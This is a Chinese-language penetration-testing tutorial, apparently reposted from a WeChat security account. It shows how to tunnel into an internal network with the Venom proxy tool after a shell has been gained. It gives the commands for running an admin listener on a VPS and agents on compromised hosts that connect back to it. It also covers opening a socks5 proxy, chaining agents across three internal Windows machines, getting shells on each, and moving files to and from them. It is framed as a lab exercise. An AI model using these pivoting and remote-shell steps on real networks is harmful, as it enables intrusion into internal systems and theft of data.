使用Venom多级代理工具穿透内网

admin

102157
文章

87
评论

2021年8月23日16:00:50评论1,049 views字数 2131阅读7分6秒阅读模式

前提：已经拿到某服务器shell，可以上传文件且具有执行权限；

项目地址(编译后):https://github.com/Dliv3/Venom/releases

使用Venom多级代理工具穿透内网

一、进入内网

1.上传admin_linux_x64到vps端，运行并监听本地11111端口：

chmod 777 admin_linux_x64./ admin_linux_x64 -lport 11111

使用Venom多级代理工具穿透内网

2.利用已经拿到的的shell上传agent_linux_x64文件到目标服务器，并执行

chmod 777 agent_linux_x64./agent_linux_x64 -rhost x.x.x.x -rport 11111# x.x.x.x是指公网vps IP

使用Venom多级代理工具穿透内网

3.venom服务端有回显则表示连接成功,建立socks连接：

goto 1socks 11112# Start a socks5 server in port 11112

使用Venom多级代理工具穿透内网

4.本地通过代理软件连接vps开放的11112端口，就可以访问到目标内网

使用Venom多级代理工具穿透内网

参考链接：https://xz.aliyun.com/t/4058

如果目标内网还需要存在多个网段，那么就需要进行多级代理。以下内容为转载，原文链接：

https://blog.csdn.net/u011215939/article/details/103403545

二、穿透内网

Venom可连接节点，然后以节点为跳板，构建多级代理。

实验环境介绍：

1.外网IP：20.10.120.X（外网IP）

2.内网的机器三台windows IP地址：192.168.3.160、192.168.3.15、192.168.3.30

3.设想外网的VPS要访问最里面的192.168.3.160只能一层一层的依次访问；192.168.3.160只能和192.168.3.30相互访问；192.168.3.30可以和192.168.3.15，192.168.3.160访问而不能访问外网的VPS；最后3.15能被外网VPS访问，也能和3.30相互访问；利用Venom来进行一层一层的代理实现内网穿透；

使用Venom多级代理工具穿透内网

实验开始

1.将下载好的Venom工具依次上传到对应的机器里面，外网的VPS上面上传admin_linux_x64，并修改权限 chmod 777 admin_linux_x64

使用Venom多级代理工具穿透内网

2、使用./admin_linux_x64文件来监听本地端口，内网的机器就是用agent.exe文件来连接vps。vps执行命令./admin_linux_x64 -lport 4343，监听本地4343端口

使用Venom多级代理工具穿透内网

3、所有机器都已经上传了Venom工具包并解压，环境都是windows；在192.168.3.15机器上面执行连接操作；执行命令agent.exe -rhost 120.10.120.X -rport 4343

使用Venom多级代理工具穿透内网

外网VPS监听成功，192.168.3.15被监听：

使用Venom多级代理工具穿透内网

4、然后在VPS上进行操作；help查看命令。这里我们要使用到show，goto，listen，exit，shell这几个命令；

① 执行show命令，可以看见刚刚连接成功的一个节点；

使用Venom多级代理工具穿透内网

② goto 1可以切换到1节点上面去

使用Venom多级代理工具穿透内网

③shell 执行命令

使用Venom多级代理工具穿透内网

④exit 退出，进行下一步的监听操作。在不退出1节点的基础上面执行listen 4343端口进行监听本地端口

使用Venom多级代理工具穿透内网

5、在第二台内网主机192.168.3.30机器上面执行命令：

agent.exe -rhost 192.168.3.15 -rport 4343

使用Venom多级代理工具穿透内网

6. 此时VPS成功跨越192.168.3.15连接到192.168.3.30。

①执行show命令发现新增了一个节点；

使用Venom多级代理工具穿透内网

②切换到节点2中: goto 2 。执行命令：shell

使用Venom多级代理工具穿透内网

7.现在进行最后一步实验：公网vps穿透192.168.3.15192.168.3.30 连接到最内层192.168.3.160；依次执行命令exit，listen 4343 ；192.168.3.30机器开启本地监听：

使用Venom多级代理工具穿透内网

①在192.168.3.160机器上面进行连接操作，执行命令：

agent.exe -rhost 192.168.3.30 -rport 4343

使用Venom多级代理工具穿透内网

②VPS>show；成功建立监听

使用Venom多级代理工具穿透内网

③goto 3 切换到3节点。shell 执行命令。至此内网穿透实验成功

使用Venom多级代理工具穿透内网

其他：

1.以上监听的端口在节点上面进行listen的时候可以不一致，一台机器上也可以监听多个端口

2.本地文件上传于下载；
上传：

upload 2018.jpg C:2018.jpg#将本地的文件上传到节点1的C盘根目录下面

使用Venom多级代理工具穿透内网

下载

download C:1.gif 1.gif# 将节点1中的文件下载到本地

使用Venom多级代理工具穿透内网

3.Venom工具在执行过程中尽量不要将命令写错，写错后无法删除，只能重头来过。

使用Venom多级代理工具穿透内网

渗透工具｜提权｜内网｜SRC｜CS端安全测试｜安全加固等资料分享

Apache Tomcat 自动 WAR 部署和渗透测试工具

hash认证概念与hash破解方式(工具使用方式)

蓝队攻防｜如何在没有日志的情况下跟踪事件？

欢迎关注LemonSec

觉得不错点个“赞”、“在看”哦

本文始发于微信公众号（LemonSec）：使用Venom多级代理工具穿透内网

左青龙
微信扫一扫

右白虎
微信扫一扫

使用Venom多级代理工具穿透内网

Wireshark & Packetdrill | TCP 基础之三次握手

【LG】一款域内信息收集工具

常用burpsuite渗透插件

REvil - 勒索病毒应急响应

Heimdallr :高危资产指纹和蜜罐特征的工具

监控网络流量三大件：SFlow、NetFlow、SNMP

如何使用Holehe检查你的邮箱是否在各种网站上注册过

Web Cache Vulnerability Scanner 是一个基于 Go 的 CLI 工具

域密码喷射工具集分享

Heimdallr 一款指纹和蜜罐特征检测工具

发表评论

在线咨询

微信